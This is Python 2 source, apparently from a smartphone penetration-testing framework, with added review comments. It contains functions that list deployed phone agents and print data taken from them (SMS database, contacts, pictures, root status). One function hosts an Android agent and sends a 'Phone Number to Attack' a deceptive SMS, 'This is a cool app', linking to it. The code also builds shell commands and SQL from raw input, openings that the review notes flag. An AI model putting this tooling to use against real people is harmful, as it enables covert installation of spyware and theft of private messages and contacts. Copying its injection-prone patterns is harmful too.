def view_data():
    """List the stored agents and show the data gathered by the chosen one.

    Reads the row count of the ``agents`` table, prints the ``number`` column
    for every id from 1 up to that count, then prompts on the console.
    Answering ``exit``, an empty line or ``0`` returns 0. Any other answer is
    handed to ``get_data`` as the agent id.
    """
    agent_count = db_exec_rows('SELECT COUNT(*) from %s' % 'agents')
    print(color(35, '[*] View Data Gathered from a Deployed Agent:\n'))
    print(color(35, '[*] Available Agents:\n'))

    # Assumes agent ids run 1..count without gaps -- TODO confirm against the schema.
    agent_id = 1
    while agent_id <= agent_count:
        number = db_exec_rows('SELECT number from agents where id=%s' % str(agent_id))
        print(color(35, '\t%s.)' % agent_id) + str(' %s\n' % number))
        agent_id += 1

    print(color(33, '\n[*] Select an agent to interact with, or press 0 to return to the previous menu.\n'))
    status = 0
    choice = raw_input(color(31, '[*] spf>'))
    if choice in ('exit', '', '0', 0):
        return status

    # NOTE(review): `choice` is free-form console text and is passed on exactly
    # as typed. get_data places it into SQL statement text, so it should be
    # constrained to a numeric id somewhere on this path.
    try:
        status = get_data(choice)
    except Exception as err:
        print(color(31, '[!] Error: %s' % err))
        status = 1
    # No return follows in the visible listing: `status` is assigned but this
    # path yields None to the caller.
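def get_data(x):
    """Print the columns stored in the ``data`` table for one row id.

    Queries the ``sms``, ``contacts``, ``picture`` and ``root`` columns for
    the given id and prints them as one coloured block. Failures are reported
    on the console instead of being raised.

    Args:
        x: Row id, as an int or a numeric string. The id ends up inside the
            SQL statement text, so it is coerced to an integer first; a value
            that is not a whole number is rejected before any query is built.

    Returns:
        None in every case.
    """
    # The caller forwards raw prompt input. Only a plain integer may be spliced
    # into the statement text, otherwise the input could rewrite the query.
    try:
        row_id = int(str(x))
    except (TypeError, ValueError):
        print(color(31, '[!] Error: agent id must be a whole number, got %r' % (x,)))
        return

    try:
        # Column names are fixed literals; only the validated id varies.
        smsrow, contactsrow, picturerow, rootrow = [
            db_exec_rows('SELECT %s from data where id=%d' % (column, row_id))
            for column in ('sms', 'contacts', 'picture', 'root')
        ]
        # The labels are concatenated without separators, exactly as before;
        # any line breaks come from the row values themselves.
        data_table = (color(35, '\n\n[*] Data:\n') +
                      color(33, str('[+] SMS Database: %s' % smsrow +
                                    '[+] Contacts: %s' % contactsrow +
                                    '[+] Picture Location: %s' % picturerow +
                                    '[+] Rooted: %s' % rootrow)))
        print(data_table)
    except Exception as e:
        print(color(31, '[!] Error: %s' % e))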
def get_modem():
    """Report the stored modem count, or list the modems and prompt for one.

    Returns the row count of the ``modems`` table when that count is 0 or 1.
    With more rows, the ``number`` column of each id from 1 to the count is
    printed and the operator is asked to pick one. The answer is checked with
    ``int()`` and a conversion failure is reported on the console.
    """
    modem_count = db_exec_rows('SELECT COUNT(*) from modems')
    if modem_count in (0, 1):
        return modem_count

    print(color(35, '\n\n[*] Available Modem(s):\n'))
    modem_id = 1
    while modem_id <= modem_count:
        number = db_exec_rows('SELECT %s from modems where id=%s' % ('number', modem_id))
        print(color(35, '\t%s.)' % modem_id) + ' %s\n' % number)
        modem_id += 1

    prompt = color(35, '\nSelect a modem to interact with\n\n') + color(31, '[*] spf>')
    chosenmodem = raw_input(prompt)
    # NOTE(review): the converted value is never returned in the visible
    # listing, so this path yields None. Callers that put the result into a
    # query should be checked against that.
    try:
        parsed = int(chosenmodem)
    except Exception as err:
        print(color(31, '[!] Error when casting input as int: %s' % err))
def get_usb_modem():
    """Report the stored USB modem count, or list USB modems and prompt for one.

    Returns the count of ``modems`` rows whose type is ``usb`` when that count
    is 0 or 1. Otherwise every id from 0 up to the total modem count is
    checked, the ``number`` of each row typed ``usb`` is printed, and the
    operator is prompted for a choice.
    """
    usb_count = db_exec_rows('SELECT COUNT(*) from modems where type="usb"')
    if usb_count in (0, 1):
        return usb_count

    # Show only the rows whose type column reads 'usb'.
    print(color(33, '\n\nAvailable Modems:\n\n'))
    row2 = int(db_exec_rows('SELECT COUNT(*) from modems'))
    for modem_id in range(row2 + 1):
        modem_type = db_exec_rows('SELECT type from modems where id=%s' % str(modem_id))
        if str(modem_type) == 'usb':
            number = db_exec_rows("SELECT number from modems where id=%s" % str(modem_id))
            print(color(35, '\t%s.)' % modem_id) + ' %s\n' % number)

    prompt = color(35, '\n[*] Select a modem to interact with\n') + color(31, '[*] spf>')
    chosenmodem = str(raw_input(prompt))
    # NOTE(review): this compares the typed text (a str) with an integer count.
    # Python 2 orders numbers before strings, so the branch looks unreachable
    # and the range check never takes effect -- confirm the intent.
    if chosenmodem <= row2:
        return chosenmodem
    try:
        parsed = int(chosenmodem)
    except Exception as err:
        print(color(31, '[!] Error when casting input as int: %s' % err))
def direct_download():
    """Stage the agent file under the web server path and send its link by SMS.

    Reads the ``server`` and ``ipaddress`` settings from the ``Web`` config
    section, prompts for a hosting path, a filename and a phone number, copies
    the file named by the global ``location`` to ``webserver + path + filename``
    and then hands a message containing the resulting ``http://`` link to the
    modem chosen through ``get_modem``. For a modem of type ``usb`` the message
    is written to a serial port. For type ``app`` a command line is written to
    a ``getfunc`` file under the web server path.

    Returns:
        0 when no modem is found. The final ``return 0`` is reconstructed from
        a flattened listing, so its nesting level should be confirmed.
    """
    #TODO: cleanup
    webserver = config.get('Web', 'server')
    ipaddress = config.get('Web', 'ipaddress')
    print color(35, '[*] This module sends an SMS with a link to directly download and install an Agent\n')
    print color(31, '[!] ONLY Android currently Supported')
    #platform = str(raw_input('Platform(Android/iPhone/Blackberry): '))
    platform = 'android'
    # Lots of potential for error with the way this is handled, would
    # prefer safer execution
    # NOTE(review): all three values below are taken as typed, with no length,
    # character or format checks before they reach a shell command, a file
    # path and a modem command further down.
    path = str(raw_input(color(33, '[-] Hosting Path: ' )))
    filename = str(raw_input(color(33, '[-] Filename: ' )))
    number = str(raw_input(color(33, '[-] Phone Number to Attack: ')))
    if platform.lower() == 'android':
        # The link is plain http, built by concatenation with no separator
        # added; `path` presumably has to start and end with '/' -- confirm.
        link = 'http://%s%s%s' % (ipaddress, path, filename)
        fullpath = '%s%s' % (webserver, path)
        # NOTE(review): `path` and `filename` are interpolated into shell
        # command strings. Shell metacharacters in them are interpreted by the
        # shell, and '..' segments can place the copy outside `webserver`.
        # os.makedirs / shutil.copy on a normalised path that is checked to
        # stay under `webserver` would avoid both. The result of system() is
        # ignored, so a failed mkdir or cp goes unnoticed.
        command1 = 'mkdir %s' % fullpath
        system(command1)
        global location # Android agent location
        command = 'cp %s %s%s%s'% (location, webserver, path, filename)
        system(command)
        modem = get_modem()
        # NOTE(review): only 0 is handled here. get_modem as visible in this
        # file returns nothing after its prompt, so `modem` may be None when
        # it is interpolated into the queries below -- confirm.
        if modem == 0:
            print color(31, '\n[!] No modems found. Attach a modem to use this functionality\n')
            return 0
        else:
            # Column names are fixed literals; `modem` is the only varying part.
            pathquery = "SELECT %s from modems where id=%s" % ('path', modem)
            path2 = db_exec_rows(pathquery)
            keyquery = "SELECT %s from modems where id=%s" % ('controlkey', modem)
            key2 = db_exec_rows(keyquery)
            modemtypequery = "SELECT %s from modems where id=%s" % ('type', modem)
            modemtype2 = db_exec_rows(modemtypequery)
            if modemtype2 == 'usb':
                # The serial device is hard-coded; `path2` read above is not
                # used in this branch.
                usb = serial.serialposix(port='/dev/ttyUSB2', baudrate=115200, bytesize=8, parity='N', stopbits=1)
                # AT command exchange with fixed sleeps between steps. Each
                # modem reply is printed but not checked. The port is not
                # closed if any step raises.
                usb.write('ATZ\r\n')
                sleep(1)
                line = read_modem(usb)
                print line
                sleep(1)
                usb.write('AT+CMGF=1\r\n')
                line = read_modem(usb)
                print line
                sleep(1)
                # `number` is placed inside the quoted command argument as typed.
                numberline = 'AT+CMGS="%s"\r\n' % number
                usb.write(numberline)
                line = read_modem(usb)
                print line
                sleep(1)
                msg = 'This is a cool app: %s' % link
                # NOTE(review): format 'b' describes a single value but two are
                # supplied. struct.pack raises struct.error when the counts
                # differ -- confirm whether this branch was ever exercised.
                usb.write(struct.pack('b', 26, msg))
                sleep(5)
                line = read_modem(usb)
                print line
                sleep(1)
                usb.close()
            elif modemtype2 == 'app':
                # NOTE(review): the modem's control key and the phone number
                # are written in clear text to a file below `webserver`. If
                # that directory is served over HTTP, as its use for hosting
                # above suggests, the key is readable by anyone who can fetch
                # the file -- confirm.
                control = '%s%s/getfunc' % (webserver, path2)
                command2 = '%s SEND %s This is a cool app: %s' % (key2, number, link)
                # `file` shadows the Python 2 builtin. The handle is not
                # closed if write() raises.
                file = open(control, 'w')
                file.write(command2)
                file.close()
    # NOTE(review): nesting of this return is reconstructed -- confirm.
    return 0